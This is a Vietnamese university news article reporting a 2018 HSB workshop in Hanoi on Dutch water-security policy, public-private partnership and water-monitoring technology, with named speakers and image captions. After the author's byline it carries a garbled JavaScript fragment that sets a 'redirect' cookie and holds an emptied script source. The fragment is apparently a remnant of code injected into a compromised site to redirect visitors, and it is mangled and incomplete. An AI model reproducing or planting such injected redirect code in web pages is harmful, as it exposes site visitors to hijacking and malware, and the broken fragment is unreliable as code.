Cách tiếp cận mới về vấn đề An ninh nguồn nước tại HSB

ANNN-2Trao đổi về vai trò của chính phủ Hà Lan trong việc đảm bảo an ninh nguồn nước tại Việt Nam, Tiến sĩ Laurent Umans đã đưa ra cách tiếp cận mới về biện pháp chống sạt lở tại Đồng bằng Sông Cửu Long cũng như những giải pháp để ứng phó với biến đổi khí hậu tại đây.

Trong khuôn khổ chương trình đào tạo của bộ môn An ninh nguồn nước, chương trình Thạc sĩ Quản trị An ninh phi truyền thống (MNS), sáng 16/9/2018, Khoa Quản trị và Kinh doanh (HSB) – ĐHQGHN đã tổ chức Hội thảo mang tên: “Khuôn khổ cho hợp tác công tư và triển khai giải pháp công nghệ đảm bảo an ninh nguồn nước của Hà Lan”.

Hội thảo được tổ chức nhằm đem lại cho học viên của chương trình MNS các thông tin về tầm nhìn, nhiệm vụ, chiến lược của Chính phủ Hà Lan trong việc quản lý An ninh nguồn nước; khung hợp tác giữa chính phủ Hà Lan và các công ty, tổ chức đầu tư đang áp dụng công nghệ mới về xử lý nước, cũng như giới thiệu các công nghệ mới hiện đang được áp dụng tại Hà Lan để đảm bảo an ninh nguồn nước.

Hội thảo có sự tham dự của các chuyên gia về Biến đổi khí hậu – ĐHQGHN, các chuyên gia đến từ Viện Khoa học tài nguyên nước – Bộ Tài nguyên và Môi trường, Sở Tài nguyên và môi trường TP Hà Nội, Công ty TNHH một thành viên Nước sạch TP Hà Nội.

Hội thảo vinh dự tiếp đón các diễn giả: Tiến sĩ Laurent Umans – Bí thư thứ nhất phụ trách quản lý nước và biến đổi khí hậu – Đại sứ quán Hà Lan tại Việt Nam, Ngài Melchior Van Wijen – Giám đốc điều hành Công ty Optiqua Technologies.

Hội thảo này còn có sự tham gia của các giảng viên, cựu học viên và học viên chương trình Thạc sĩ Quản trị An ninh phi truyền thống – Khoa Quản trị và Kinh doanh.

ANNN-3

Tại buổi hội thảo, Nhóm nghiên cứu đảm bảo An ninh môi trường của Khoa Quản trị và Kinh doanh đã giới thiệu về các hoạt động của Nhóm nghiên cứu cũng như các dự án đang thực hiện liên quan đến vấn đề quản trị An ninh nguồn nước. Được thành lập từ năm 2016, Nhóm nghiên cứu của HSB đã hợp tác với nhiều đơn vị như TT Quan trắc môi trường – Sở Tài nguyên và Môi trường TP Hà Nội, Công ty TNHH một thành viên Nước sạch TP Hà Nội, Đại sứ quán Hà Lan… trong việc thực hiện các dự án đảm bảo an ninh môi trường trên địa bàn TP Hà Nội.

Trao đổi về vai trò của chính phủ Hà Lan trong việc đảm bảo an ninh nguồn nước tại Việt Nam, Tiến sĩ Laurent Umans đã đưa ra cách tiếp cận mới về biện pháp chống sạt lở tại Đồng bằng Sông Cửu Long cũng như những giải pháp để ứng phó với biến đổi khí hậu tại đây. Hội thảo cũng nhận được sự chia sẻ của Ngài Melchior Van Wijen – Giám đốc điều hành Công ty Optiqua Technologies về những công nghệ tiên tiến đảm bảo an ninh nguồn nước đang triển khai tại Hà Lan cũng như phương thức hỗ trợ của chính phủ Hà Lan, Singapore và Liên minh Châu Âu trong việc phát triển và thương mại hóa công nghệ quan trắc nguồn nước.

Đánh giá cao giá trị khoa học và thực tiễn của Hội thảo, GS.TS Mai Trọng Nhuận – Nguyên Giám đốc ĐHQGHN, Chuyên gia cấp cao về vấn đề Biến đổi khí hậu cho biết: “Cần mở rộng hơn nữa những hội thảo khoa học tương tự nhằm đem lại cách tiếp cận mới về vấn đề đảm bảo an ninh nguồn nước nói riêng và biến đổi khí hậu nói chung dành cho các nhà khoa học, các nhà hoạch định chính sách. Từ đó, Việt Nam có thêm nhiều cơ hội để lĩnh hội và học hỏi công nghệ, tri thức tiên tiến của thế giới để áp dụng vào thực tiễn tại các vùng đang bị ảnh hưởng sâu sắc bởi việc mất an ninh nguồn nước và biến đổi khí hậu”.

Hội thảo nằm trong khung chương trình đào tạo Thạc sĩ Quản trị An ninh phi truyền thống (MNS) của Khoa Quản trị và Kinh doanh, được tổ chức thường kỳ với các nhóm hoạt động chính, như: Tư vấn về các vấn đê An ninh phi truyền thống, Tư vấn và chuyển giao công nghệ trong vấn đề đảm bảo an ninh môi trường…Thành công của các Hội thảo chuyên đề góp phần quan trọng trong việc phát triển nghiên cứu khoa học tại Khoa Quản trị và Kinh doanh nói riêng, Đại học Quốc gia Hà Nội nói chung, khẳng định phương pháp học tập tiên tiến đang được áp dụng thành công tại các chương trình đào tạo Thạc sĩ của HSB.

Dưới đây là một số hình ảnh tại Hội thảo về vấn đề An ninh nguồn nước tổ chức tại Khoa Quản trị và Kinh doanh:

ANNN-6

ANNN-7

ANNN-8

ANNN-1

ANNN-2

ANNN-4

ANNN-5

ANNN-9

Thùy Dung

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}

Related Posts